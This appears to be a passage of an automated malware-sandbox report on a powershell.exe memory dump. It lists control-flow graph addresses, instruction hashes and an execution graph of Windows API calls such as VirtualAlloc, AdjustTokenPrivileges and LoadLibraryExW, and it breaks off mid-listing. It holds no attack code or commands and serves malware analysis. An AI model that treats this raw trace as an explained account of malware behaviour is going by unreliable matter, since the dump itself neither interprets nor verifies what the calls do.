                  control_flow_graph 115 7fe89ac8549-7fe89ac85f9 116 7fe89ac8add-7fe89ac8b96 115->116 117 7fe89ac85ff-7fe89ac8609 115->117 118 7fe89ac860b-7fe89ac8618 117->118 119 7fe89ac8622-7fe89ac8629 117->119 118->119 123 7fe89ac861a-7fe89ac8620 118->123 120 7fe89ac862b-7fe89ac863e 119->120 121 7fe89ac8640 119->121 124 7fe89ac8642-7fe89ac8644 120->124 121->124 123->119 126 7fe89ac864a-7fe89ac8656 124->126 127 7fe89ac8a58-7fe89ac8a62 124->127 126->116 131 7fe89ac865c-7fe89ac8666 126->131 129 7fe89ac8a75-7fe89ac8a85 127->129 130 7fe89ac8a64-7fe89ac8a74 127->130 133 7fe89ac8a87-7fe89ac8a8b 129->133 134 7fe89ac8a92-7fe89ac8adc 129->134 135 7fe89ac8668-7fe89ac8675 131->135 136 7fe89ac8682-7fe89ac8692 131->136 133->134 135->136 137 7fe89ac8677-7fe89ac8680 135->137 136->127 142 7fe89ac8698-7fe89ac86cc 136->142 137->136 142->127 147 7fe89ac86d2-7fe89ac86de 142->147 147->116 148 7fe89ac86e4-7fe89ac86ee 147->148 149 7fe89ac8707-7fe89ac870c 148->149 150 7fe89ac86f0-7fe89ac86fd 148->150 149->127 152 7fe89ac8712-7fe89ac8717 149->152 150->149 151 7fe89ac86ff-7fe89ac8705 150->151 151->149 152->127 153 7fe89ac871d-7fe89ac8722 152->153 153->127 155 7fe89ac8728-7fe89ac8737 153->155 156 7fe89ac8747 155->156 157 7fe89ac8739-7fe89ac8743 155->157 160 7fe89ac874c-7fe89ac8759 156->160 158 7fe89ac8763-7fe89ac87ee 157->158 159 7fe89ac8745 157->159 167 7fe89ac8802-7fe89ac8824 158->167 168 7fe89ac87f0-7fe89ac87fb 158->168 159->160 160->158 161 7fe89ac875b-7fe89ac8761 160->161 161->158 169 7fe89ac8826-7fe89ac8830 167->169 170 7fe89ac8834 167->170 168->167 171 7fe89ac8832 169->171 172 7fe89ac8850-7fe89ac88de 169->172 173 7fe89ac8839-7fe89ac8846 170->173 171->173 180 7fe89ac88f2-7fe89ac8910 172->180 181 7fe89ac88e0-7fe89ac88eb 172->181 173->172 174 7fe89ac8848-7fe89ac884e 173->174 174->172 182 7fe89ac8912-7fe89ac891c 180->182 183 7fe89ac8920 180->183 181->180 184 7fe89ac893d-7fe89ac89cd 182->184 185 7fe89ac891e 182->185 186 7fe89ac8925-7fe89ac8933 183->186 193 7fe89ac89cf-7fe89ac89da 184->193 194 7fe89ac89e1-7fe89ac8a3a 184->194 185->186 186->184 188 7fe89ac8935-7fe89ac893b 186->188 188->184 193->194 197 7fe89ac8a42-7fe89ac8a57 194->197
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc6fd2091e8dae0d3d7aeef86f1d7e072752b5b4f45e245964049c0a9035c6b5
                  • Instruction ID: 35b94f3ff96226d02deb09ed360ebadad33592b546abc5ddf054c99cfa6942c5
                  • Opcode Fuzzy Hash: cc6fd2091e8dae0d3d7aeef86f1d7e072752b5b4f45e245964049c0a9035c6b5
                  • Instruction Fuzzy Hash: C422F63090CB894FD79ADB2C94506B97BE2FF9A744F2400EED44ECB2A3DA24AC55C751
                  Function 000007FE89AC4165 Relevance: .4, Instructions: 435COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 198 7fe89ac4165-7fe89ac41f4 199 7fe89ac41fa-7fe89ac4204 198->199 200 7fe89ac4457-7fe89ac4516 198->200 201 7fe89ac421d-7fe89ac4222 199->201 202 7fe89ac4206-7fe89ac4213 199->202 205 7fe89ac43fb-7fe89ac4405 201->205 206 7fe89ac4228-7fe89ac422b 201->206 202->201 203 7fe89ac4215-7fe89ac421b 202->203 203->201 209 7fe89ac4407-7fe89ac4413 205->209 210 7fe89ac4414-7fe89ac4424 205->210 207 7fe89ac422d-7fe89ac4240 206->207 208 7fe89ac4242 206->208 215 7fe89ac4244-7fe89ac4246 207->215 208->215 211 7fe89ac4426-7fe89ac442a 210->211 212 7fe89ac4431-7fe89ac4454 210->212 211->212 212->200 215->205 216 7fe89ac424c-7fe89ac4280 215->216 223 7fe89ac4297 216->223 224 7fe89ac4282-7fe89ac4295 216->224 225 7fe89ac4299-7fe89ac429b 223->225 224->225 225->205 227 7fe89ac42a1-7fe89ac42a9 225->227 227->200 228 7fe89ac42af-7fe89ac42b9 227->228 229 7fe89ac42bb-7fe89ac42c8 228->229 230 7fe89ac42d5-7fe89ac42e5 228->230 229->230 231 7fe89ac42ca-7fe89ac42d3 229->231 230->205 233 7fe89ac42eb-7fe89ac431c 230->233 231->230 233->205 237 7fe89ac4322-7fe89ac434e 233->237 239 7fe89ac4374 237->239 240 7fe89ac4350-7fe89ac4372 237->240 241 7fe89ac4376-7fe89ac4378 239->241 240->241 241->205 243 7fe89ac437e-7fe89ac4386 241->243 244 7fe89ac4396 243->244 245 7fe89ac4388-7fe89ac4392 243->245 249 7fe89ac439b-7fe89ac43a8 244->249 246 7fe89ac43b2-7fe89ac43e1 245->246 247 7fe89ac4394 245->247 253 7fe89ac43e8-7fe89ac43fa 246->253 247->249 249->246 250 7fe89ac43aa-7fe89ac43b0 249->250 250->246
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c7fe621b8e0522053fba86d8a3f78ba9b42cd845e76596065581cd5fddfbfdf
                  • Instruction ID: 3b2d24a1f550a87ee9fd61e5873df2223f648a134e97f1cb71219df07a3a3202
                  • Opcode Fuzzy Hash: 4c7fe621b8e0522053fba86d8a3f78ba9b42cd845e76596065581cd5fddfbfdf
                  • Instruction Fuzzy Hash: 5BC1353090DBCA4FE74AE72854546BA7FE1EF86758F1501EBD48ECB1A3C618AC16C361

                  Non-executed Functions

                  Function 000007FE89AC352E Relevance: .3, Instructions: 336COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62c829c2e24d71071b5207ad50ae66f3b4de56fe513071356b266c2cddd6a4bd
                  • Instruction ID: c36e8fb017852f120f41f41d1d90226404cec8ebece43208bf621e72c3e6179e
                  • Opcode Fuzzy Hash: 62c829c2e24d71071b5207ad50ae66f3b4de56fe513071356b266c2cddd6a4bd
                  • Instruction Fuzzy Hash: 6BA1052090E7CD0FD747A77898146A67FF1EF4B258F1A01EBD48DCB1A3D618991AC362

                  Execution Graph

                  Execution Coverage:6.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:4.4%
                  Total number of Nodes:918
                  Total number of Limit Nodes:48
                  execution_graph 15587 13fdd9480 15588 13fdd949f 15587->15588 15589 13fdd9498 15587->15589 15603 13fdd62a0 15588->15603 15597 13fdd4cc0 15589->15597 15592 13fdd94bc 15612 13fddfcc0 15592->15612 15594 13fdd94cc 15615 13fdde1d0 15594->15615 15598 13fdd4ced 15597->15598 15602 13fdd4d0b 15598->15602 15621 13fddacc0 FlsGetValue 15598->15621 15600 13fdd4d03 15601 13fdd5920 6 API calls 15600->15601 15601->15602 15602->15588 15604 13fdd6366 15603->15604 15605 13fdd62b8 GetCurrentThreadId GetCurrentProcess GetCurrentThread DuplicateHandle 15603->15605 15604->15592 15624 13fddaa30 VirtualQuery 15605->15624 15608 13fdd633a RaiseFailFastException 15609 13fdd6347 15608->15609 15626 13fdddcc0 15609->15626 15611 13fdd634f 15611->15592 15613 13fddfcca 15612->15613 15614 13fddfcd1 SetEvent 15612->15614 15613->15594 15614->15594 15616 13fdde20a 15615->15616 15619 13fdde22f _swprintf_c_l 15615->15619 15617 13fdd94d6 15616->15617 15618 13fdddd40 4 API calls 15616->15618 15618->15619 15619->15617 15620 13fe38fd0 _swprintf_c_l 3 API calls 15619->15620 15620->15619 15622 13fddacda RaiseFailFastException 15621->15622 15623 13fddace8 FlsSetValue 15621->15623 15622->15623 15625 13fdd632c 15624->15625 15625->15608 15625->15609 15627 13fdddcda 15626->15627 15628 13fdddcd2 15626->15628 15629 13fdddd25 15627->15629 15631 13fdddd40 15627->15631 15628->15611 15629->15611 15635 13fdddd64 15631->15635 15634 13fe38fd0 _swprintf_c_l 3 API calls 15636 13fddddf8 15634->15636 15635->15636 15639 13fe38fd0 15635->15639 15638 13fddde85 ISource 15636->15638 15642 13fddaea0 GetCurrentThreadId 15636->15642 15638->15629 15643 13fe38ed4 15639->15643 15642->15638 15644 13fe38eee malloc 15643->15644 15645 13fddddcd 15644->15645 15646 13fe38edf 15644->15646 15645->15634 15645->15638 15646->15644 15647 13fe38efe 15646->15647 15650 13fe38f09 15647->15650 15652 13fe39a2c 15647->15652 15656 13fe39a4c 15650->15656 15653 13fe39a3a std::bad_alloc::bad_alloc 15652->15653 15660 13fe3a8e0 15653->15660 15655 13fe39a4b 15657 13fe39a5a std::bad_alloc::bad_alloc 15656->15657 15658 13fe3a8e0 Concurrency::cancel_current_task 2 API calls 15657->15658 15659 13fe38f0f 15658->15659 15661 13fe3a8ff 15660->15661 15662 13fe3a928 RtlPcToFileHeader 15661->15662 15663 13fe3a94a RaiseException 15661->15663 15664 13fe3a940 15662->15664 15663->15655 15664->15663 15665 13fddfe40 15666 13fddfe5a 15665->15666 15667 13fddfe65 15665->15667 15668 13fddfe92 VirtualAlloc 15667->15668 15672 13fddfee6 15667->15672 15669 13fddfecd 15668->15669 15668->15672 15670 13fe38fd0 _swprintf_c_l 3 API calls 15669->15670 15671 13fddfede 15670->15671 15671->15672 15673 13fddff31 VirtualFree 15671->15673 15673->15672 15674 13fdd5760 15704 13fddb020 FlsAlloc 15674->15704 15676 13fdd58ce 15677 13fdd576b 15677->15676 15717 13fddaec0 GetModuleHandleExW 15677->15717 15679 13fdd578b 15718 13fdd7110 15679->15718 15681 13fdd5793 15681->15676 15726 13fddb750 15681->15726 15685 13fdd57b0 15685->15676 15686 13fdd57d8 RtlAddVectoredExceptionHandler 15685->15686 15687 13fdd57ec 15686->15687 15688 13fdd57f1 15686->15688 15690 13fdd5825 15687->15690 15691 13fddd7b0 9 API calls 15687->15691 15763 13fddd7b0 15688->15763 15692 13fdd587f 15690->15692 15740 13fdddf20 15690->15740 15691->15690 15748 13fdd9f40 15692->15748 15695 13fdd5884 15695->15676 15769 13fdd5410 15695->15769 15705 13fddb16e 15704->15705 15706 13fddb040 15704->15706 15705->15677 15780 13fde3910 15706->15780 15708 13fddb045 15709 13fde26b0 10 API calls 15708->15709 15710 13fddb04a 15709->15710 15710->15705 15711 13fddd7b0 9 API calls 15710->15711 15712 13fddb072 15711->15712 15713 13fddb09a GetCurrentProcess GetProcessAffinityMask 15712->15713 15714 13fddb091 15712->15714 15716 13fddb108 15712->15716 15713->15714 15715 13fddb0e4 QueryInformationJobObject 15714->15715 15715->15716 15716->15677 15717->15679 15719 13fe38fd0 _swprintf_c_l 3 API calls 15718->15719 15720 13fdd7125 15719->15720 15721 13fdd7164 15720->15721 15933 13fddfdc0 15720->15933 15721->15681 15723 13fdd7132 15723->15721 15724 13fddb410 InitializeCriticalSectionEx 15723->15724 15725 13fdd715d 15724->15725 15725->15681 15727 13fddb410 InitializeCriticalSectionEx 15726->15727 15728 13fdd57a0 15727->15728 15728->15676 15729 13fdd6b50 15728->15729 15730 13fe38fd0 _swprintf_c_l 3 API calls 15729->15730 15731 13fdd6b6e 15730->15731 15732 13fdd6c0a 15731->15732 15936 13fdd4d60 15731->15936 15732->15685 15734 13fdd6ba0 15735 13fdd6bea 15734->15735 15943 13fdd4e50 15734->15943 15735->15685 15737 13fdd6bad 15739 13fdd6bbd ISource 15737->15739 15947 13fdd4be0 15737->15947 15739->15685 15741 13fdddff6 15740->15741 15742 13fdddf4b 15740->15742 15741->15692 15743 13fe38fd0 _swprintf_c_l 3 API calls 15742->15743 15744 13fdddf6a 15743->15744 15745 13fddb410 InitializeCriticalSectionEx 15744->15745 15746 13fdddf95 15745->15746 15747 13fdddfde GetSystemTimeAsFileTime 15746->15747 15747->15741 15749 13fe389ab 15748->15749 15750 13fdd9f79 EventRegister 15749->15750 15751 13fdd9ffc 15750->15751 15753 13fdd9ff7 15750->15753 15752 13fddd7b0 9 API calls 15751->15752 15752->15753 15952 13fdda820 15753->15952 15756 13fdda074 15756->15695 15757 13fdda04b 15757->15756 15970 13fdd6960 15757->15970 15759 13fdda054 15759->15756 15977 13fdde9d0 15759->15977 15760 13fdda064 15760->15695 15766 13fddd820 15763->15766 15764 13fddd8a0 _wcsicmp 15764->15766 15768 13fddd8bd 15764->15768 15765 13fe38fb0 8 API calls 15767 13fddd99d 15765->15767 15766->15764 15766->15768 15767->15687 15768->15765 15773 13fdd543a 15769->15773 15777 13fdd559b 15769->15777 15770 13fdd5726 15770->15676 15778 13fddb410 15770->15778 15772 13fdd571a RaiseFailFastException 15772->15770 15773->15777 16248 13fddb1d0 LoadLibraryExW 15773->16248 15775 13fdd5516 15775->15777 16251 13fddb180 LoadLibraryExW 15775->16251 15777->15770 16254 13fddb220 15777->16254 15779 13fe38bd9 InitializeCriticalSectionEx 15778->15779 15907 13fdd9b90 15780->15907 15783 13fdd9b90 9 API calls 15784 13fde394e 15783->15784 15785 13fdd9b90 9 API calls 15784->15785 15786 13fde3969 15785->15786 15787 13fdd9b90 9 API calls 15786->15787 15788 13fde3984 15787->15788 15789 13fdd9b90 9 API calls 15788->15789 15790 13fde39a4 15789->15790 15791 13fdd9b90 9 API calls 15790->15791 15792 13fde39bf 15791->15792 15793 13fdd9b90 9 API calls 15792->15793 15794 13fde39df 15793->15794 15795 13fdd9b90 9 API calls 15794->15795 15796 13fde39fa 15795->15796 15797 13fdd9b90 9 API calls 15796->15797 15798 13fde3a15 15797->15798 15799 13fdd9b90 9 API calls 15798->15799 15800 13fde3a30 15799->15800 15801 13fdd9b90 9 API calls 15800->15801 15802 13fde3a50 15801->15802 15803 13fdd9b90 9 API calls 15802->15803 15804 13fde3a70 15803->15804 15913 13fdd9d50 15804->15913 15807 13fdd9d50 9 API calls 15808 13fde3aa0 15807->15808 15809 13fdd9d50 9 API calls 15808->15809 15810 13fde3ab5 15809->15810 15811 13fdd9d50 9 API calls 15810->15811 15812 13fde3aca 15811->15812 15813 13fdd9d50 9 API calls 15812->15813 15814 13fde3adf 15813->15814 15815 13fdd9d50 9 API calls 15814->15815 15816 13fde3af9 15815->15816 15817 13fdd9d50 9 API calls 15816->15817 15818 13fde3b0e 15817->15818 15819 13fdd9d50 9 API calls 15818->15819 15820 13fde3b23 15819->15820 15821 13fdd9d50 9 API calls 15820->15821 15822 13fde3b38 15821->15822 15823 13fdd9d50 9 API calls 15822->15823 15824 13fde3b4d 15823->15824 15825 13fdd9d50 9 API calls 15824->15825 15826 13fde3b62 15825->15826 15827 13fdd9d50 9 API calls 15826->15827 15828 13fde3b77 15827->15828 15829 13fdd9d50 9 API calls 15828->15829 15830 13fde3b91 15829->15830 15831 13fdd9d50 9 API calls 15830->15831 15832 13fde3bab 15831->15832 15833 13fdd9d50 9 API calls 15832->15833 15834 13fde3bc0 15833->15834 15835 13fdd9d50 9 API calls 15834->15835 15836 13fde3bd5 15835->15836 15837 13fdd9d50 9 API calls 15836->15837 15838 13fde3bea 15837->15838 15839 13fdd9d50 9 API calls 15838->15839 15840 13fde3bff 15839->15840 15841 13fdd9d50 9 API calls 15840->15841 15842 13fde3c19 15841->15842 15843 13fdd9d50 9 API calls 15842->15843 15844 13fde3c33 15843->15844 15845 13fdd9d50 9 API calls 15844->15845 15846 13fde3c48 15845->15846 15847 13fdd9d50 9 API calls 15846->15847 15848 13fde3c5d 15847->15848 15849 13fdd9d50 9 API calls 15848->15849 15850 13fde3c72 15849->15850 15851 13fdd9d50 9 API calls 15850->15851 15852 13fde3c87 15851->15852 15853 13fdd9d50 9 API calls 15852->15853 15854 13fde3c9c 15853->15854 15855 13fdd9d50 9 API calls 15854->15855 15856 13fde3cb1 15855->15856 15857 13fdd9d50 9 API calls 15856->15857 15858 13fde3cc6 15857->15858 15859 13fdd9d50 9 API calls 15858->15859 15860 13fde3cdb 15859->15860 15861 13fdd9d50 9 API calls 15860->15861 15862 13fde3cf0 15861->15862 15863 13fdd9d50 9 API calls 15862->15863 15864 13fde3d05 15863->15864 15865 13fdd9d50 9 API calls 15864->15865 15866 13fde3d1a 15865->15866 15867 13fdd9d50 9 API calls 15866->15867 15868 13fde3d2f 15867->15868 15869 13fdd9d50 9 API calls 15868->15869 15870 13fde3d44 15869->15870 15871 13fdd9d50 9 API calls 15870->15871 15872 13fde3d59 15871->15872 15873 13fdd9d50 9 API calls 15872->15873 15874 13fde3d6e 15873->15874 15875 13fdd9d50 9 API calls 15874->15875 15876 13fde3d83 15875->15876 15877 13fdd9d50 9 API calls 15876->15877 15878 13fde3d98 15877->15878 15879 13fdd9d50 9 API calls 15878->15879 15880 13fde3dad 15879->15880 15881 13fdd9d50 9 API calls 15880->15881 15882 13fde3dc2 15881->15882 15883 13fdd9d50 9 API calls 15882->15883 15884 13fde3dd7 15883->15884 15885 13fdd9d50 9 API calls 15884->15885 15886 13fde3dec 15885->15886 15887 13fdd9d50 9 API calls 15886->15887 15888 13fde3e01 15887->15888 15889 13fdd9d50 9 API calls 15888->15889 15890 13fde3e16 15889->15890 15891 13fdd9d50 9 API calls 15890->15891 15892 13fde3e30 15891->15892 15893 13fdd9d50 9 API calls 15892->15893 15894 13fde3e4a 15893->15894 15895 13fdd9d50 9 API calls 15894->15895 15896 13fde3e64 15895->15896 15897 13fdd9d50 9 API calls 15896->15897 15898 13fde3e7e 15897->15898 15899 13fdd9d50 9 API calls 15898->15899 15900 13fde3e98 15899->15900 15901 13fdd9d50 9 API calls 15900->15901 15902 13fde3eb2 15901->15902 15903 13fdd9d50 9 API calls 15902->15903 15904 13fde3ec7 15903->15904 15905 13fdd9d50 9 API calls 15904->15905 15906 13fde3ee1 15905->15906 15912 13fdd9bc3 15907->15912 15910 13fddd7b0 9 API calls 15911 13fdd9bc7 15910->15911 15919 13fe38fb0 15911->15919 15912->15910 15912->15911 15912->15912 15916 13fdd9d80 15913->15916 15914 13fddd7b0 9 API calls 15915 13fdd9e98 15914->15915 15917 13fe38fb0 8 API calls 15915->15917 15916->15914 15916->15916 15918 13fdd9eb0 15917->15918 15918->15807 15920 13fe38fb9 15919->15920 15921 13fdd9cfe 15920->15921 15922 13fe39abc IsProcessorFeaturePresent 15920->15922 15921->15783 15923 13fe39ad4 15922->15923 15928 13fe39b90 RtlCaptureContext 15923->15928 15929 13fe39baa RtlLookupFunctionEntry 15928->15929 15930 13fe39ae7 15929->15930 15931 13fe39bc0 RtlVirtualUnwind 15929->15931 15932 13fe39a88 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15930->15932 15931->15929 15931->15930 15934 13fddb410 InitializeCriticalSectionEx 15933->15934 15935 13fddfe0c 15934->15935 15935->15723 15937 13fe38fd0 _swprintf_c_l 3 API calls 15936->15937 15938 13fdd4d7e 15937->15938 15939 13fddb410 InitializeCriticalSectionEx 15938->15939 15940 13fdd4db0 15938->15940 15939->15940 15941 13fdd4e08 ISource 15940->15941 15950 13fddb3f0 15940->15950 15941->15734 15944 13fdd4e55 15943->15944 15945 13fdd4e66 ISource 15943->15945 15946 13fddb3f0 DeleteCriticalSection 15944->15946 15945->15737 15946->15945 15948 13fddb3f0 15947->15948 15948->15739 15949 13fe38a4d DeleteCriticalSection 15948->15949 15950->15941 15951 13fe38a4d DeleteCriticalSection 15950->15951 15987 13fde1d60 15952->15987 15954 13fdda037 15954->15756 15955 13fde9140 15954->15955 15998 13fdde020 15955->15998 15959 13fde915e 15961 13fde91d9 15959->15961 16005 13fde2260 15959->16005 15969 13fde944b ISource 15961->15969 16019 13fdff640 15961->16019 15963 13fde964c 15964 13fe38fd0 _swprintf_c_l 3 API calls 15963->15964 15963->15969 15965 13fde9782 15964->15965 15965->15969 16042 13fde1eb0 15965->16042 15967 13fde97ad 16047 13fdfde20 15967->16047 15969->15757 15971 13fdd6972 15970->15971 15972 13fdd69ad 15971->15972 16225 13fddfc70 CreateEventW 15971->16225 15972->15759 15974 13fdd6984 15974->15972 16226 13fddb320 CreateThread 15974->16226 15976 13fdd69a3 15976->15759 15978 13fdde9e7 15977->15978 15979 13fdde9ef 15978->15979 15980 13fe38fd0 _swprintf_c_l 3 API calls 15978->15980 15979->15760 15984 13fddea21 15980->15984 15981 13fddeb58 ISource 15981->15760 15983 13fddeaf2 ISource 15983->15760 15984->15981 15985 13fddeab5 ISource 15984->15985 16229 13fde4350 15984->16229 15985->15983 16235 13fde45e0 15985->16235 15992 13fde4c20 15987->15992 15991 13fde1d9f 15991->15954 15993 13fe38fd0 _swprintf_c_l 3 API calls 15992->15993 15994 13fde1d88 15993->15994 15994->15991 15995 13fde6770 15994->15995 15996 13fe38fd0 _swprintf_c_l 3 API calls 15995->15996 15997 13fde6785 15996->15997 15997->15991 16000 13fdde0cc 15998->16000 16001 13fdde05b 15998->16001 16004 13fde28a0 QueryPerformanceFrequency 16000->16004 16001->16000 16002 13fdddd40 4 API calls 16001->16002 16003 13fdde094 16001->16003 16002->16003 16003->16000 16070 13fdde0e0 16003->16070 16004->15959 16006 13fde2283 16005->16006 16007 13fde23d4 16006->16007 16008 13fde2297 GetCurrentProcess IsProcessInJob 16006->16008 16011 13fde2418 16007->16011 16012 13fde2422 GlobalMemoryStatusEx 16007->16012 16009 13fde22ec 16008->16009 16010 13fde2393 16008->16010 16009->16010 16013 13fde22f6 QueryInformationJobObject 16009->16013 16010->16007 16014 13fde23ab GlobalMemoryStatusEx 16010->16014 16015 13fe38fb0 8 API calls 16011->16015 16012->16011 16013->16010 16016 13fde2318 16013->16016 16014->16007 16017 13fde2464 16015->16017 16016->16010 16018 13fde235c GlobalMemoryStatusEx 16016->16018 16017->15961 16018->16010 16078 13fde28f0 VirtualAlloc 16019->16078 16021 13fdff662 16022 13fdff6c7 16021->16022 16154 13fde2690 InitializeCriticalSection 16021->16154 16024 13fdffabd 16022->16024 16081 13fe10410 16022->16081 16026 13fdff6f1 _swprintf_c_l 16041 13fdff933 16026->16041 16091 13fdff340 16026->16091 16028 13fdff8c8 16095 13fdfce10 16028->16095 16032 13fdff902 16032->16041 16102 13fdffae0 16032->16102 16035 13fdff928 16155 13fde29e0 VirtualFree 16035->16155 16037 13fdff957 16037->16041 16116 13fe130a0 16037->16116 16041->15963 16043 13fe38fd0 _swprintf_c_l 3 API calls 16042->16043 16044 13fde1ed6 16043->16044 16045 13fde1ede CreateEventW 16044->16045 16046 13fde1f00 ISource 16044->16046 16045->16046 16046->15967 16048 13fdfdeaa _swprintf_c_l 16047->16048 16049 13fde1eb0 4 API calls 16048->16049 16050 13fdfdeb8 16049->16050 16069 13fdfe717 16050->16069 16203 13fde2880 QueryPerformanceCounter 16050->16203 16053 13fdfded6 16054 13fdfe246 16053->16054 16053->16069 16204 13fe01660 16053->16204 16055 13fe01660 9 API calls 16054->16055 16056 13fdfe279 16055->16056 16057 13fe01660 9 API calls 16056->16057 16056->16069 16058 13fdfe2b8 16057->16058 16059 13fe38fd0 _swprintf_c_l 3 API calls 16058->16059 16058->16069 16060 13fdfe581 16059->16060 16061 13fdfe5cd 16060->16061 16062 13fdfe5e4 16060->16062 16060->16069 16064 13fdfe5da DebugBreak 16061->16064 16061->16069 16063 13fe38fd0 _swprintf_c_l 3 API calls 16062->16063 16065 13fdfe630 16063->16065 16064->16069 16066 13fe38fd0 _swprintf_c_l 3 API calls 16065->16066 16065->16069 16067 13fdfe6bd 16066->16067 16067->16069 16218 13fde2690 InitializeCriticalSection 16067->16218 16069->15969 16071 13fdde13c 16070->16071 16072 13fdde135 16070->16072 16071->16000 16074 13fdddb70 16072->16074 16076 13fdddb9a _swprintf_c_l 16074->16076 16075 13fdddbc1 16075->16071 16076->16075 16077 13fe38fd0 _swprintf_c_l 3 API calls 16076->16077 16077->16075 16079 13fde2929 16078->16079 16080 13fde2911 VirtualFree 16078->16080 16079->16021 16080->16021 16082 13fe1043f 16081->16082 16083 13fe10462 16082->16083 16084 13fe1046c 16082->16084 16089 13fe10497 16082->16089 16156 13fde2a80 16083->16156 16086 13fde2a00 3 API calls 16084->16086 16088 13fe1047d 16086->16088 16088->16089 16167 13fde29e0 VirtualFree 16088->16167 16089->16026 16093 13fdff35f 16091->16093 16094 13fdff37c 16093->16094 16168 13fde1f70 16093->16168 16094->16028 16096 13fdfce32 16095->16096 16097 13fe38fb0 8 API calls 16096->16097 16098 13fdfcf53 16097->16098 16099 13fde2a00 16098->16099 16100 13fde2a25 VirtualAlloc 16099->16100 16101 13fde2a44 GetCurrentProcess VirtualAllocExNuma 16099->16101 16100->16101 16101->16032 16106 13fdffb0e 16102->16106 16103 13fe38fb0 8 API calls 16104 13fdff924 16103->16104 16104->16035 16104->16037 16105 13fdffb18 16105->16103 16106->16105 16107 13fdffec3 EnterCriticalSection 16106->16107 16109 13fdffef0 LeaveCriticalSection 16106->16109 16110 13fdfffe1 LeaveCriticalSection 16106->16110 16111 13fdfffb7 16106->16111 16175 13fde2930 16106->16175 16107->16106 16107->16109 16109->16106 16113 13fdfffed 16110->16113 16112 13fdfffc0 EnterCriticalSection 16111->16112 16111->16113 16112->16110 16113->16105 16115 13fe00025 EnterCriticalSection LeaveCriticalSection 16113->16115 16178 13fde29c0 VirtualFree 16113->16178 16115->16113 16179 13fe12fb0 16116->16179 16119 13fdfed00 16122 13fdfed30 16119->16122 16120 13fdff31d 16124 13fdff326 16120->16124 16125 13fdff332 16120->16125 16121 13fdff311 16201 13fde1e10 CloseHandle 16121->16201 16127 13fde1eb0 4 API calls 16122->16127 16152 13fdfed8f 16122->16152 16202 13fde1e10 CloseHandle 16124->16202 16125->16041 16128 13fdfedcf 16127->16128 16129 13fde1eb0 4 API calls 16128->16129 16128->16152 16130 13fdfede5 _swprintf_c_l 16129->16130 16130->16152 16185 13fde2080 16130->16185 16132 13fdff10a 16133 13fde1eb0 4 API calls 16132->16133 16134 13fdff187 16133->16134 16135 13fdff1c9 16134->16135 16136 13fde1eb0 4 API calls 16134->16136 16137 13fdff2bd 16135->16137 16138 13fdff2c9 16135->16138 16135->16152 16141 13fdff19d 16136->16141 16197 13fde1e10 CloseHandle 16137->16197 16139 13fdff2de 16138->16139 16140 13fdff2d2 16138->16140 16144 13fdff2e7 16139->16144 16145 13fdff2f3 16139->16145 16198 13fde1e10 CloseHandle 16140->16198 16141->16135 16192 13fde1e30 16141->16192 16199 13fde1e10 CloseHandle 16144->16199 16147 13fdff2fc 16145->16147 16145->16152 16200 13fde1e10 CloseHandle 16147->16200 16150 13fdff1b3 16150->16135 16151 13fde1eb0 4 API calls 16150->16151 16151->16135 16152->16120 16152->16121 16153 13fdff277 16152->16153 16153->16041 16154->16022 16155->16041 16157 13fde2aae LookupPrivilegeValueW 16156->16157 16158 13fde2b46 GetLargePageMinimum 16156->16158 16161 13fde2b7f 16157->16161 16162 13fde2aca GetCurrentProcess OpenProcessToken 16157->16162 16159 13fde2b66 VirtualAlloc 16158->16159 16160 13fde2b83 GetCurrentProcess VirtualAllocExNuma 16158->16160 16159->16161 16160->16161 16164 13fe38fb0 8 API calls 16161->16164 16162->16161 16163 13fde2b01 AdjustTokenPrivileges GetLastError CloseHandle 16162->16163 16163->16161 16165 13fde2b3b 16163->16165 16166 13fde2bb6 16164->16166 16165->16158 16165->16161 16166->16088 16167->16089 16169 13fde1f78 16168->16169 16170 13fde1f91 GetLogicalProcessorInformation 16169->16170 16174 13fde1fbd ISource 16169->16174 16171 13fde1fc4 16170->16171 16172 13fde1fb2 GetLastError 16170->16172 16173 13fde2001 GetLogicalProcessorInformation 16171->16173 16171->16174 16172->16171 16172->16174 16173->16174 16174->16094 16176 13fde296e GetCurrentProcess VirtualAllocExNuma 16175->16176 16177 13fde294b VirtualAlloc 16175->16177 16176->16106 16177->16106 16178->16113 16180 13fe12fc9 16179->16180 16183 13fdffa9c 16179->16183 16181 13fe12fe4 LoadLibraryExW 16180->16181 16180->16183 16182 13fe13012 GetProcAddress 16181->16182 16181->16183 16184 13fe13027 16182->16184 16183->16119 16184->16183 16186 13fde216f GlobalMemoryStatusEx 16185->16186 16187 13fde20b7 GetCurrentProcess 16185->16187 16190 13fde20d8 16186->16190 16188 13fde20d0 16187->16188 16188->16186 16188->16190 16189 13fe38fb0 8 API calls 16191 13fde2248 16189->16191 16190->16189 16191->16132 16193 13fe38fd0 _swprintf_c_l 3 API calls 16192->16193 16194 13fde1e56 16193->16194 16195 13fde1e5e CreateEventW 16194->16195 16196 13fde1e7e ISource 16194->16196 16195->16196 16196->16150 16197->16138 16198->16139 16199->16145 16200->16152 16201->16120 16202->16125 16203->16053 16207 13fe0168d 16204->16207 16205 13fe016e3 EnterCriticalSection 16209 13fe01700 16205->16209 16206 13fe01767 16210 13fe017c1 16206->16210 16214 13fde2930 3 API calls 16206->16214 16207->16205 16207->16206 16208 13fe017b1 